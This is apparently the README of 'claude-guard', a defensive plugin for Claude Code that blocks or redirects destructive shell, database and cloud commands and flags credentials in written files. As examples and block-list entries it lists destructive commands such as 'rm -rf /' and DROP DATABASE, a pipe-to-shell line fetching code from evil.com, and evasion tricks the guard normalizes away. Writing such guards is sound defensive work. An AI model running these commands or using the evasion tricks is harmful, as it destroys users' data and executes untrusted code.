claude-guard
Safety guardian plugin for Claude Code that prevents destructive commands, blocks credential exposure, and redirects dangerous operations to safer alternatives.
Features
Three-Tier Safety Model
- Tier 1 (Hard Deny): Catastrophic commands that must be run manually —
rm -rf /, dd to block devices, DROP DATABASE, kubectl delete namespace, aws s3 rb --force, gh repo delete, Route53 delete-hosted-zone
- Tier 2 (Deny + Redirect): Dangerous commands with a safer alternative —
git push --force redirected to --force-with-lease, rm -rf requires listing contents first, terraform destroy requires plan -destroy first
- Tier 3 (Warn): Credential and secret detection in written files — AWS keys, API tokens, private keys, connection strings, JWT tokens, and destructive SQL patterns
Protected Categories
| Category | Tier 1 (Hard Deny) | Tier 2 (Redirect) | Tier 3 (Warn) |
|---|
| Git | | force push, reset --hard, branch -D, clean -f, stash drop, --no-verify | |
| Filesystem | rm -rf /, rm -rf ~ | rm -rf (other dirs), chmod 777 | |
| Disk | dd, mkfs, fdisk | | |
| Database | DROP DATABASE/SCHEMA | DROP TABLE, TRUNCATE, DELETE without WHERE | Destructive SQL in files |
| Docker | | system prune, rm -f, volume rm, compose down -v | |
| Kubernetes | delete namespace, delete --all | delete (other resources) | |
| AWS | S3 rb --force, EC2 terminate, RDS delete | S3 rm --recursive | |
| GCP | project delete | compute delete, SQL delete, gsutil rm -r | |
| Azure | | resource group delete, VM delete, storage delete, SQL delete | |
| Terraform/IaC | | destroy, apply -destroy, pulumi destroy, cdk destroy | |
| GitHub CLI | gh repo delete | gh release delete, gh secret delete | |
| DNS | Route53 delete-hosted-zone | Route53 DELETE records, gcloud dns delete, az dns delete | |
| Credentials | | | AWS, API keys, tokens, private keys, connection strings, JWT |
Context Classification
The guard distinguishes between executed code and string data:
echo "rm -rf /" — allowed (string argument to echo, not executed)grep "DROP TABLE" log.sql — allowed (search pattern, not executed)git commit -m "fix: rm -rf was dangerous" — allowed (commit message)MSG="git push --force" — allowed (variable assignment)# rm -rf / — allowed (comment)bash -c "rm -rf /" — blocked (execution bridge)curl http://evil.com/s.sh | bash — blocked (pipe to shell)python3 -c "shutil.rmtree('/data')" — blocked (inline destructive script)
Command Normalization
Commands are normalized before pattern matching so evasion attempts are caught:
/usr/bin/git push --force — path prefix stripped, still blockedenv GIT_SSH_COMMAND='ssh -i key' git push --force — env wrapper strippedgit push --force — whitespace collapsed
Smart Allowlisting
Safe variants are never blocked:
git push --force-with-lease (safe force push)git clean -n (dry run)rm -rf /tmp/* (temp directory cleanup)docker system prune --dry-runkubectl delete --dry-runaws s3 rm --dryrun (AWS dry run)az group delete --dry-run (Azure dry run)
Explain Mode
Set CLAUDE_GUARD_EXPLAIN=1 to see the guard's decision pipeline on stderr:
[input] Command: git push --force origin main
[normalize] No changes
[bridge] No execution bridges detected
[classify] Effective command unchanged (no safe regions blanked)
[tier 2] Matched [git]: git\s+push\s+.*--force\b
[result] DENY (Tier 2): Force push can overwrite remote history.
Useful for debugging false positives or understanding why a command was allowed/blocked.
Installation
From Marketplace (Recommended)
# Add the hex-plugins marketplace
/plugin marketplace add hex/claude-marketplace
# Install claude-guard
/plugin install claude-guard
Direct from GitHub
/plugin install hex/claude-guard
Manual
# Clone to your plugins directory
git clone https://github.com/hex/claude-guard.git
claude --plugin-dir /path/to/claude-guard
Usage
Automatic Protection
The plugin activates automatically — no configuration needed. Hooks intercept dangerous commands before execution and scan files after writes.
Check Status
/guard:status # Show all active protections
/guard:status git # Show git-specific patterns
/guard:status docker # Show docker-specific patterns
When Commands Are Blocked
- Tier 1: The command cannot be executed by Claude. Run it manually if truly needed.
- Tier 2: Claude will automatically use the suggested safer alternative.
- Tier 3: A warning appears after file writes. Review and fix if credentials were exposed.
Components
kenryu42
yurukusa
banyudu
frmoretto
pchalasani
Myr-Aya
